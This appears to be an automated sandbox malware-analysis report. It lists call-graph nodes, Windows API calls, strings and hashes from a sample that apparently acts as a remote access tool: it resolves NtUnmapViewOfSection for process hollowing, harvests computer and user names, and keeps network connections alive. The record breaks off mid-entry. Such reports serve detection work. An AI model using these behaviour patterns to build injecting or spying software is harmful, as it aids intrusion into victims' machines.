408f49 46544->46546 46548 40c5ed 31 API calls 46545->46548 46547 40c5ed 31 API calls 46546->46547 46549 408f51 46547->46549 46550 408f68 46548->46550 46552 401ef3 28 API calls 46549->46552 46551 401ef3 28 API calls 46550->46551 46553 408f76 46551->46553 46578 408f5b 46552->46578 46554 401ee9 11 API calls 46553->46554 46555 408f7e 46554->46555 46966 4081c7 28 API calls 46555->46966 46556 401ee9 11 API calls 46558 408fb5 46556->46558 46560 408ffb 46558->46560 46561 408fdc 46558->46561 46559 408f90 46967 402ff4 46559->46967 46974 408098 28 API calls 46560->46974 46562 408fe1 46561->46562 46563 409013 46561->46563 46972 408098 28 API calls 46562->46972 46569 401ee9 11 API calls 46563->46569 46568 409009 46975 409203 85 API calls 46568->46975 46573 40901b 46569->46573 46570 408fef 46973 4092ba 29 API calls 46570->46973 46571 401ef3 28 API calls 46575 408fa5 46571->46575 46573->46251 46577 401ee9 11 API calls 46575->46577 46576 408ff9 46576->46563 46577->46578 46578->46556 47012 40415e 46579->47012 46584 402ff4 28 API calls 46585 41965d 46584->46585 46586 401ee9 11 API calls 46585->46586 46587 419666 46586->46587 46588 401ee9 11 API calls 46587->46588 46589 40dca2 46588->46589 46590 401ef3 46589->46590 46591 401f02 46590->46591 46598 401f4a 46590->46598 46592 402232 11 API calls 46591->46592 46593 401f0b 46592->46593 46594 401f4d 46593->46594 46596 401f26 46593->46596 46595 402316 11 API calls 46594->46595 46595->46598 47109 40303c 28 API calls 46596->47109 46599 401ee9 46598->46599 46600 402232 11 API calls 46599->46600 46601 401ef2 46600->46601 46601->46296 46601->46297 47110 40533f 28 API calls 46602->47110 46605 4020bf 11 API calls 46604->46605 46606 413994 46605->46606 47111 419894 46606->47111 46609 4020bf 11 API calls 46610 4139aa 46609->46610 46611 401e45 22 API calls 46610->46611 46612 4139b8 46611->46612 46613 439867 _strftime 39 API calls 46612->46613 46614 4139c5 46613->46614 46615 4139d7 46614->46615 46616 4139ca Sleep 46614->46616 46617 402073 28 API calls 46615->46617 46616->46615 46618 4139e6 46617->46618 46619 401e45 22 API calls 46618->46619 46620 4139ef 46619->46620 46621 4020d6 28 API calls 46620->46621 46622 4139fa 46621->46622 46623 419d87 28 API calls 46622->46623 46624 413a02 46623->46624 47115 40487e WSAStartup 46624->47115 46626 413a0c 46627 401e45 22 API calls 46626->46627 46628 413a15 46627->46628 46629 401e45 22 API calls 46628->46629 46653 413a94 46628->46653 46630 413a2e 46629->46630 46631 401e45 22 API calls 46630->46631 46632 413a3f 46631->46632 46634 401e45 22 API calls 46632->46634 46633 419d87 28 API calls 46633->46653 46635 413a50 46634->46635 46637 401e45 22 API calls 46635->46637 46636 40822a 28 API calls 46636->46653 46638 413a61 46637->46638 46640 401e45 22 API calls 46638->46640 46639 401fc2 28 API calls 46639->46653 46641 413a72 46640->46641 46642 401e45 22 API calls 46641->46642 46643 413a84 46642->46643 47217 40471d 88 API calls 46643->47217 46645 402073 28 API calls 46645->46653 46646 4194da 79 API calls 46646->46653 46648 413be2 WSAGetLastError 47218 41a86b 30 API calls 46648->47218 46651 4052dd 28 API calls 46651->46653 46653->46633 46653->46636 46653->46639 46653->46645 46653->46646 46653->46648 46653->46651 46656 401e45 22 API calls 46653->46656 46657 4052fe 28 API calls 46653->46657 46658 401e6d 11 API calls 46653->46658 46659 402ef0 28 API calls 46653->46659 46660 439867 _strftime 39 API calls 46653->46660 46661 408209 28 API calls 46653->46661 46663 401fb8 11 API calls 46653->46663 46667 4020d6 28 API calls 46653->46667 46669 411f91 31 API calls 46653->46669 46692 413e11 46653->46692 47116 41393f 46653->47116 47121 40480d 46653->47121 47128 404f31 46653->47128 47143 4048a8 connect 46653->47143 47203 404e06 WaitForSingleObject 46653->47203 47219 413013 50 API calls 46653->47219 47220 408098 28 API calls 46653->47220 47221 43f34f 20 API calls 46653->47221 47222 4120e8 RegOpenKeyExA RegQueryValueExA RegCloseKey 46653->47222 46656->46653 46657->46653 46658->46653 46659->46653 46662 4144bf Sleep 46660->46662 46661->46653 46662->46653 46663->46653 46667->46653 46669->46653 46670 40415e 28 API calls 46670->46692 46671 401e45 22 API calls 46672 413e7b GetTickCount 46671->46672 47223 419b16 28 API calls 46672->47223 46675 419b16 28 API calls 46675->46692 46678 419c8a 28 API calls 46678->46692 46680 402e81 28 API calls 46680->46692 46681 408209 28 API calls 46681->46692 46683 402ef0 28 API calls 46683->46692 46685 401ee9 11 API calls 46685->46692 46688 402073 28 API calls 46688->46692 46689 4194da 79 API calls 46689->46692 46690 414461 CreateThread 46690->46692 47254 418ccd 104 API calls 46690->47254 46691 401fb8 11 API calls 46691->46692 46692->46653 46692->46670 46692->46671 46692->46675 46692->46678 46692->46680 46692->46681 46692->46683 46692->46685 46692->46688 46692->46689 46692->46690 46692->46691 47224 419ac6 GetTickCount 46692->47224 47225 419a77 30 API calls ___scrt_get_show_window_mode 46692->47225 47226 40e2bb 29 API calls 46692->47226 47227 402f11 28 API calls 46692->47227 47228 40826c 28 API calls 46692->47228 47229 404a81 60 API calls _Yarn 46692->47229 47230 404bf0 112 API calls new 46692->47230 47231 409f9a 84 API calls 46692->47231 46693->46077 46694->46085 46695->46089 46698 4020bf 11 API calls 46697->46698 46699 408236 46698->46699 46700 403280 28 API calls 46699->46700 46701 408253 46700->46701 46701->46111 46703 40d5c5 46702->46703 46704 411f5e RegQueryValueExA RegCloseKey 46702->46704 46703->46108 46703->46132 46704->46703 46705->46114 46706->46134 46707->46161 46708->46134 46709->46142 46711 401f66 11 API calls 46710->46711 46712 40c609 46711->46712 46713 40c629 46712->46713 46714 40c65e 46712->46714 46715 40c61f 46712->46715 47255 41959f 29 API calls 46713->47255 46718 419f23 GetCurrentProcess 46714->46718 46717 40c752 GetLongPathNameW 46715->46717 46720 40415e 28 API calls 46717->46720 46721 40c663 46718->46721 46719 40c632 46722 401ef3 28 API calls 46719->46722 46723 40c767 46720->46723 46724 40c667 46721->46724 46725 40c6b9 46721->46725 46726 40c63c 46722->46726 46727 40415e 28 API calls 46723->46727 46729 40415e 28 API calls 46724->46729 46728 40415e 28 API calls 46725->46728 46733 401ee9 11 API calls 46726->46733 46731 40c776 46727->46731 46732 40c6c7 46728->46732 46730 40c675 46729->46730 46738 40415e 28 API calls 46730->46738 47258 40c7f9 28 API calls 46731->47258 46737 40415e 28 API calls 46732->46737 46733->46715 46735 40c789 47259 402f85 28 API calls 46735->47259 46740 40c6dd 46737->46740 46741 40c68b 46738->46741 46739 40c794 47260 402f85 28 API calls 46739->47260 47257 402f85 28 API calls 46740->47257 47256 402f85 28 API calls 46741->47256 46745 40c79e 46748 401ee9 11 API calls 46745->46748 46746 40c6e8 46749 401ef3 28 API calls 46746->46749 46747 40c696 46750 401ef3 28 API calls 46747->46750 46751 40c7a8 46748->46751 46752 40c6f3 46749->46752 46753 40c6a1 46750->46753 46754 401ee9 11 API calls 46751->46754 46755 401ee9 11 API calls 46752->46755 46756 401ee9 11 API calls 46753->46756 46757 40c7b1 46754->46757 46758 40c6fc 46755->46758 46759 40c6aa 46756->46759 46760 401ee9 11 API calls 46757->46760 46761 401ee9 11 API calls 46758->46761 46762 401ee9 11 API calls 46759->46762 46763 40c7ba 46760->46763 46761->46726 46762->46726 46764 401ee9 11 API calls 46763->46764 46765 40c7c3 46764->46765 46766 401ee9 11 API calls 46765->46766 46767 40c7cc 46766->46767 46767->46223 46768->46234 46769->46248 46770->46252 46771->46162 46772->46198 46773->46290 46774->46279 46775->46138 46778 4194b0 LoadResource LockResource SizeofResource 46777->46778 46779 40dd9e 46777->46779 46778->46779 46779->46394 46781 40209f 46780->46781 46789 4023ae 46781->46789 46783 4020aa 46793 4024ea 46783->46793 46785 4020b9 46785->46398 46787 402097 28 API calls 46786->46787 46788 406302 46787->46788 46788->46405 46790 402408 46789->46790 46791 4023b8 46789->46791 46790->46783 46791->46790 46800 402787 11 API calls std::_Deallocate 46791->46800 46794 4024fa 46793->46794 46795 402515 46794->46795 46796 402500 46794->46796 46811 4028c8 28 API calls 46795->46811 46801 402549 46796->46801 46799 402513 46799->46785 46800->46790 46812 402868 46801->46812 46803 40255d 46804 402572 46803->46804 46805 402587 46803->46805 46817 402a14 22 API calls 46804->46817 46819 4028c8 28 API calls 46805->46819 46808 40257b 46818 4029ba 22 API calls 46808->46818 46810 402585 46810->46799 46811->46799 46813 402870 46812->46813 46814 402878 46813->46814 46820 402c83 22 API calls 46813->46820 46814->46803 46817->46808 46818->46810 46819->46810 46822 4020c7 46821->46822 46823 4023ae 11 API calls 46822->46823 46824 4020d2 46823->46824 46824->46414 46825->46414 46827 41aba7 46826->46827 46828 41ac06 46827->46828 46832 41abb7 46827->46832 46829 41ac20 46828->46829 46830 41ad46 28 API calls 46828->46830 46847 41aec3 28 API calls 46829->46847 46830->46829 46833 41abef 46832->46833 46838 41ad46 46832->46838 46846 41aec3 28 API calls 46833->46846 46834 41ac02 46834->46414 46837->46423 46840 41ad4e 46838->46840 46839 41ad80 46839->46833 46840->46839 46841 41ad84 46840->46841 46844 41ad68 46840->46844 46858 402705 22 API calls 46841->46858 46848 41adb7 46844->46848 46846->46834 46847->46834 46849 41adc1 __EH_prolog 46848->46849 46859 4026f7 22 API calls 46849->46859 46851 41add4 46860 41aeda 11 API calls 46851->46860 46853 41ae32 46853->46839 46854 41adfa 46854->46853 46861 402710 11 API calls 46854->46861 46856 41ae19 46862 4026f2 11 API calls std::_Deallocate 46856->46862 46859->46851 46860->46854 46861->46856 46862->46853 46863->46437 46864->46441 46865->46443 46869 40328a 46867->46869 46868 4032a9 46868->46453 46869->46868 46871 4028c8 28 API calls 46869->46871 46871->46868 46873 4051db 46872->46873 46882 405254 46873->46882 46875 4051e8 46875->46456 46877 402041 46876->46877 46878 4023ae 11 API calls 46877->46878 46879 40205b 46878->46879 46906 40265a 46879->46906 46883 405262 46882->46883 46884 405268 46883->46884 46885 40527e 46883->46885 46893 4025d0 46884->46893 46887 4052d5 46885->46887 46888 405296 46885->46888 46903 402884 22 API calls 46887->46903 46892 40527c 46888->46892 46902 4028c8 28 API calls 46888->46902 46892->46875 46894 402868 22 API calls 46893->46894 46895 4025e2 46894->46895 46896 402652 46895->46896 46897 402609 46895->46897 46905 402884 22 API calls 46896->46905 46901 40261b 46897->46901 46904 4028c8 28 API calls 46897->46904 46901->46892 46902->46892 46904->46901 46907 40266b 46906->46907 46908 4023ae 11 API calls 46907->46908 46909 40206d 46908->46909 46909->46459 46910->46467 46911->46472 46913 419f30 GetCurrentProcess 46912->46913 46914 4192bc 46912->46914 46913->46914 46915 411f91 RegOpenKeyExA 46914->46915 46916 411fbf RegQueryValueExA RegCloseKey 46915->46916 46917 411fe9 46915->46917 46916->46917 46918 402073 28 API calls 46917->46918 46919 411ffe 46918->46919 46919->46480 46920->46488 46922 4024d9 46921->46922 46923 4024ea 28 API calls 46922->46923 46924 402091 46923->46924 46924->46178 46941 4397c5 46925->46941 46927 438bd0 46928 438c0b 46927->46928 46930 438be5 46927->46930 46940 438bea __cftoe 46927->46940 46947 438557 35 API calls 2 library calls 46928->46947 46946 43ad91 20 API calls _free 46930->46946 46933 438c17 46934 438c46 46933->46934 46948 43980a 39 API calls __Toupper 46933->46948 46936 438cb2 46934->46936 46949 439771 20 API calls 2 library calls 46934->46949 46950 439771 20 API calls 2 library calls 46936->46950 46938 438d79 _strftime 46938->46940 46951 43ad91 20 API calls _free 46938->46951 46940->46517 46942 4397ca 46941->46942 46943 4397dd 46941->46943 46952 43ad91 20 API calls _free 46942->46952 46943->46927 46945 4397cf __cftoe 46945->46927 46946->46940 46947->46933 46948->46933 46949->46936 46950->46938 46951->46940 46952->46945 46959 401f90 46953->46959 46955 402efe 46956 402035 11 API calls 46955->46956 46957 402f0d 46956->46957 46957->46531 46958->46534 46960 4025d0 28 API calls 46959->46960 46961 401f9d 46960->46961 46961->46955 46963 401f6e 46962->46963 46976 402232 46963->46976 46965 401f79 46965->46544 46966->46559 46981 403202 46967->46981 46969 403002 46985 403242 46969->46985 46972->46570 46973->46576 47009 4092fb 156 API calls 46973->47009 46974->46568 46975->46563 47010 409311 48 API calls 46975->47010 47011 409305 121 API calls 46975->47011 46977 40228c 46976->46977 46978 40223c 46976->46978 46977->46965 46978->46977 46980 402759 11 API calls std::_Deallocate 46978->46980 46980->46977 46982 40320e 46981->46982 46991 4035f8 46982->46991 46984 40321b 46984->46969 46986 40324e 46985->46986 46987 402232 11 API calls 46986->46987 46988 403268 46987->46988 47005 402316 46988->47005 46992 403606 46991->46992 46993 403624 46992->46993 46994 40360c 46992->46994 46996 40363c 46993->46996 46997 40367e 46993->46997 47002 403686 28 API calls 46994->47002 47001 403622 46996->47001 47003 4027c6 28 API calls 46996->47003 47004 402884 22 API calls 46997->47004 47001->46984 47002->47001 47003->47001 47006 402327 47005->47006 47007 402232 11 API calls 47006->47007 47008 4023a7 47007->47008 47008->46571 47013 404166 47012->47013 47014 402232 11 API calls 47013->47014 47015 404171 47014->47015 47023 40419c 47015->47023 47018 4042dc 47036 404333 47018->47036 47020 4042ea 47021 403242 11 API calls 47020->47021 47022 4042f9 47021->47022 47022->46584 47024 4041a8 47023->47024 47027 4041b9 47024->47027 47026 40417c 47026->47018 47028 4041c9 47027->47028 47029 4041e6 47028->47029 47030 4041cf 47028->47030 47035 4027c6 28 API calls 47029->47035 47034 404247 28 API calls 47030->47034 47033 4041e4 47033->47026 47034->47033 47035->47033 47037 40433f 47036->47037 47040 404351 47037->47040 47039 40434d 47039->47020 47041 40435f 47040->47041 47042 404365 47041->47042 47043 40437e 47041->47043 47106 4034c6 28 API calls 47042->47106 47044 402868 22 API calls 47043->47044 47045 404386 47044->47045 47047 4043f9 47045->47047 47048 40439f 47045->47048 47108 402884 22 API calls 47047->47108 47059 40437c 47048->47059 47107 4027c6 28 API calls 47048->47107 47059->47039 47106->47059 47107->47059 47109->46598 47114 4198da _Yarn ___scrt_get_show_window_mode 47111->47114 47112 402073 28 API calls 47113 41399f 47112->47113 47113->46609 47114->47112 47115->46626 47117 413958 getaddrinfo WSASetLastError 47116->47117 47118 41394e 47116->47118 47117->46653 47232 4137dc 29 API calls ___std_exception_copy 47118->47232 47120 413953 47120->47117 47122 404826 socket 47121->47122 47123 404819 47121->47123 47125 404840 CreateEventW 47122->47125 47126 404822 47122->47126 47233 40487e WSAStartup 47123->47233 47125->46653 47126->46653 47127 40481e 47127->47122 47127->47126 47129 404f45 47128->47129 47130 404fca 47128->47130 47131 404f4e 47129->47131 47132 404fa0 CreateEventA CreateThread 47129->47132 47133 404f5d GetLocalTime 47129->47133 47130->46653 47131->47132 47132->47130 47235 405130 47132->47235 47234 419b16 28 API calls 47133->47234 47135 404f71 47136 4052dd 28 API calls 47135->47136 47137 404f81 47136->47137 47138 402073 28 API calls 47137->47138 47139 404f90 47138->47139 47140 4194da 79 API calls 47139->47140 47141 404f95 47140->47141 47142 401fb8 11 API calls 47141->47142 47142->47132 47144 4049fb 47143->47144 47145 4048ce 47143->47145 47146 40495e 47144->47146 47147 404a01 WSAGetLastError 47144->47147 47145->47146 47149 4052fe 28 API calls 47145->47149 47169 404903 47145->47169 47146->46653 47147->47146 47148 404a11 47147->47148 47150 404912 47148->47150 47151 404a16 47148->47151 47153 4048ef 47149->47153 47156 402073 28 API calls 47150->47156 47250 41a86b 30 API calls 47151->47250 47157 402073 28 API calls 47153->47157 47155 40490b 47155->47150 47162 404921 47155->47162 47159 404a60 47156->47159 47160 4048fe 47157->47160 47158 404a20 47161 4052dd 28 API calls 47158->47161 47163 402073 28 API calls 47159->47163 47164 4194da 79 API calls 47160->47164 47165 404a30 47161->47165 47166 404930 47162->47166 47167 404967 47162->47167 47168 404a6f 47163->47168 47164->47169 47170 402073 28 API calls 47165->47170 47171 402073 28 API calls 47166->47171 47247 41f7f5 53 API calls 47167->47247 47172 4194da 79 API calls 47168->47172 47239 41ea15 27 API calls 47169->47239 47174 404a3f 47170->47174 47175 40493f 47171->47175 47172->47146 47177 4194da 79 API calls 47174->47177 47181 402073 28 API calls 47175->47181 47176 40496f 47178 4049a4 47176->47178 47179 404974 47176->47179 47180 404a44 47177->47180 47249 41ebbb 28 API calls 47178->47249 47182 402073 28 API calls 47179->47182 47183 401fb8 11 API calls 47180->47183 47184 40494e 47181->47184 47186 404983 47182->47186 47183->47146 47187 4194da 79 API calls 47184->47187 47189 402073 28 API calls 47186->47189 47190 404953 47187->47190 47188 4049ac 47191 4049d9 CreateEventW CreateEventW 47188->47191 47193 402073 28 API calls 47188->47193 47192 404992 47189->47192 47240 41ea55 47190->47240 47191->47146 47194 4194da 79 API calls 47192->47194 47196 4049c2 47193->47196 47197 404997 47194->47197 47198 402073 28 API calls 47196->47198 47248 41ee67 51 API calls 47197->47248 47199 4049d1 47198->47199 47201 4194da 79 API calls 47199->47201 47202 4049d6 47201->47202 47202->47191 47204 404e20 SetEvent CloseHandle 47203->47204 47205 404e37 closesocket 47203->47205 47206 404eb8 47204->47206 47207 404e44 47205->47207 47206->46653 47208 404e53 47207->47208 47209 404e5a 47207->47209 47253 4050c4 83 API calls 47208->47253 47211 404e6c WaitForSingleObject 47209->47211 47212 404eae SetEvent CloseHandle 47209->47212 47213 41ea55 3 API calls 47211->47213 47212->47206 47214 404e7b SetEvent WaitForSingleObject 47213->47214 47215 41ea55 3 API calls 47214->47215 47216 404e93 SetEvent FindCloseChangeNotification FindCloseChangeNotification 47215->47216 47216->47212 47217->46653 47218->46653 47219->46653 47220->46653 47221->46653 47222->46653 47223->46692 47224->46692 47225->46692 47226->46692 47227->46692 47228->46692 47229->46692 47230->46692 47231->46692 47232->47120 47233->47127 47234->47135 47238 40513c 101 API calls 47235->47238 47237 405139 47238->47237 47239->47155 47241 41c4c6 47240->47241 47242 41ea5d 47240->47242 47243 41c4d4 47241->47243 47251 41b610 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47241->47251 47242->47146 47252 41c1f6 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47243->47252 47246 41c4db 47247->47176 47248->47190 47249->47188 47250->47158 47251->47243 47252->47246 47253->47209 47255->46719 47256->46747 47257->46746 47258->46735 47259->46739 47260->46745 47263 40e1a8 47261->47263 47262 411f34 3 API calls 47262->47263 47263->47262 47265 40e24e 47263->47265 47267 40e1da 47263->47267 47268 40e23e Sleep 47263->47268 47298 408098 28 API calls 47265->47298 47267->47268 47276 401ee9 11 API calls 47267->47276 47279 402073 28 API calls 47267->47279 47283 41215f 14 API calls 47267->47283 47294 40bc59 111 API calls ___scrt_get_show_window_mode 47267->47294 47295 408098 28 API calls 47267->47295 47296 419bca 28 API calls 47267->47296 47297 412204 14 API calls 47267->47297 47268->47263 47270 40e25b 47299 419bca 28 API calls 47270->47299 47273 40e267 47300 412204 14 API calls 47273->47300 47276->47267 47277 40e27a 47278 401ee9 11 API calls 47277->47278 47280 40e286 47278->47280 47279->47267 47281 402073 28 API calls 47280->47281 47282 40e297 47281->47282 47284 41215f 14 API calls 47282->47284 47283->47267 47285 40e2aa 47284->47285 47301 4112b5 TerminateProcess WaitForSingleObject 47285->47301 47287 40e2b2 ExitProcess 47302 411253 61 API calls 47292->47302 47295->47267 47296->47267 47297->47267 47298->47270 47299->47273 47300->47277 47301->47287

                                      Control-flow Graph

                                      APIs
                                      • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                      • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                      • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                      • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                      • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                      • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                      • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                      • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                      • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                      • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                      • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                      • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                      • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                      • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                      • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                      • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                      • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$HandleModule$LibraryLoad
                                      • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                      • API String ID: 551388010-2474455403
                                      • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                      • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                      • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                      • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                                      Control-flow Graph

                                      APIs
                                        • Part of subcall function 00411F34: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 00411F54
                                        • Part of subcall function 00411F34: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,00472200), ref: 00411F72
                                        • Part of subcall function 00411F34: RegCloseKey.ADVAPI32(?), ref: 00411F7D
                                      • Sleep.KERNELBASE(00000BB8), ref: 0040E243
                                      • ExitProcess.KERNEL32 ref: 0040E2B4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseExitOpenProcessQuerySleepValue
                                      • String ID: 3.8.0 Pro$override$pth_unenc$!G
                                      • API String ID: 2281282204-1386060931
                                      • Opcode ID: 0ca0d31898abc9d4a23e90bc5dff3a9897a6cad6fb2ae06b6ab3facde6dd6714
                                      • Instruction ID: b884fba6e00cc138548ee74cf6c0f0a6577cc223cd772b3e63c92b5116f64211
                                      • Opcode Fuzzy Hash: 0ca0d31898abc9d4a23e90bc5dff3a9897a6cad6fb2ae06b6ab3facde6dd6714
                                      • Instruction Fuzzy Hash: 6E213770B4030027DA08B6768D5BAAE35899B82708F40446FF911AB2D7EEBD8D4583DF

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1127 404f31-404f3f 1128 404f45-404f4c 1127->1128 1129 404fca 1127->1129 1131 404f54-404f5b 1128->1131 1132 404f4e-404f52 1128->1132 1130 404fcc-404fd1 1129->1130 1133 404fa0-404fc8 CreateEventA CreateThread 1131->1133 1134 404f5d-404f9b GetLocalTime call 419b16 call 4052dd call 402073 call 4194da call 401fb8 1131->1134 1132->1133 1133->1130 1134->1133
                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 00404F61
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FAD
                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005130,?,00000000,00000000), ref: 00404FC0
                                      Strings
                                      • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404F74
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: Connection KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-507513762
                                      • Opcode ID: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                      • Instruction ID: 3880ceca910d84d0b9b3d3001f949c19a9d90d4f91ad2e0c59d2668d569340f7
                                      • Opcode Fuzzy Hash: 5d766c76dcec6d73f72b384432e0c1d874659834d306d7d3d0de572776f31551
                                      • Instruction Fuzzy Hash: 4F1127719002806AC720BB769C0DE9B7FA89BD2714F44056FF44123281D6B89445CBBA

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1166 4315ec-431606 CryptAcquireContextA 1167 431608 1166->1167 1168 43160d-43161c CryptGenRandom 1166->1168 1169 43160a-43160b 1167->1169 1170 431622-43162c CryptReleaseContext 1168->1170 1171 43161e-431620 1168->1171 1172 43162e-431630 1169->1172 1170->1172 1171->1169
                                      APIs
                                      • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,00431274,00000034,?,?,05597720), ref: 004315FE
                                      • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000), ref: 00431614
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00431307,00000000,?,00000000,0041C006), ref: 00431626
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt$Context$AcquireRandomRelease
                                      • String ID:
                                      • API String ID: 1815803762-0
                                      • Opcode ID: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                      • Instruction ID: e2f248fbd61bea3c509e9dcbc4a9d000159a3c4e1760f154dd59208f6820a057
                                      • Opcode Fuzzy Hash: 490f37dff30391dd88b2b348f1e17f82ee14bc365aa64bdd7ac48a14519942bc
                                      • Instruction Fuzzy Hash: FDE0923130C310BBEB304F51AC09F172A55EB8DB72FA5063AF112E50F4D6518801855C
                                      APIs
                                      • GetComputerNameExW.KERNELBASE(00000001,?,00000037,00471FFC), ref: 00419615
                                      • GetUserNameW.ADVAPI32(?,00000010), ref: 0041962D
                                      Memory Dump Source
                                      • Source File: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_13_2_400000_csc.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Name$ComputerUser
                                      • String ID:
                                      • API String ID: 4229901323-0
                                      • Opcode ID: 6478cae6bbf69b57607277aa92944695820edf464b885749181eae48eaee1890
                                      • Instruction ID: 5ca8c18713c22ae7facf93a828c8627c995cdb1c7496207664ac88b3b4335c79
